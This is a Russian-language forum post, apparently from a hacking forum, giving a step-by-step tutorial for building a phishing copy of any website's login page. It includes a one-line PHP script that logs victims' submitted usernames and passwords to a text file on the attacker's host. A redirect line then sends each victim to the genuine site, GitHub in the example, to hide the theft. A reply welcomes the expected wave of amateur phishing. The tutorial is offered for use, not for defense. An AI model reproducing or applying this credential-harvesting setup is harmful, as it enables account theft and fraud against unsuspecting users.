Перейти к публикации

hunter

Создаём фишинг с любого сайта

Рекомендованные сообщения

 

Сегодня мы научимся делать примитивную фишинговую копию абсолютно любого сайта.

 

1. Выбираем сайт, фейк которого мы будем создавать;

2. Переходим на страницу авторизации и копируем ссылку на него;

3. Переходим по ссылке;

4. Проходим регистрацию через «TempMail»;

5. После регистрации вводим в графу домен сайта, который будем дублировать

V3s6bXf.jpeg

6. После завершения копирования к нам на почту придёт ссылка на скачивание архива с сайтом;

7. Заходим в файл страницы и ищем параметр "Action", меняем его на "auth.php" 

jw32D7u.jpeg

8. Далее в папке с .html создаём файл "auth.php" и папку "base";

9. Открываем "auth.php" в любом удобном для вас кодовом редакторе, например. «Sublime Text 2» и добавляем следующий код:

<?php file_put_contents('base/ds_logs.txt', "Username: ".$_POST['login']." Password: ", $_POST['password'].'\n', FILE_APPEND); ?>

10. Загружаем на хостинг и права на файл ставим 777;

11. Заходим на наш сайт и пытается авторизоваться, ваши данные будут сохранены по ссылке: вашдомен.com/base/ds_logs.txt;

12. В "auth.php" добавляем следующее:

header('Location: https://github.com/session');

└ Теперь после ввода логина и пароля жертву будет перебрасывать на оригинальный сайт авторизации;

Поделиться сообщением


Ссылка на сообщение

Ручками конечно покачественнее будет, но спасибо за инфу. Ожидаем волну школо фишенгов 

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×
×
  • Создать...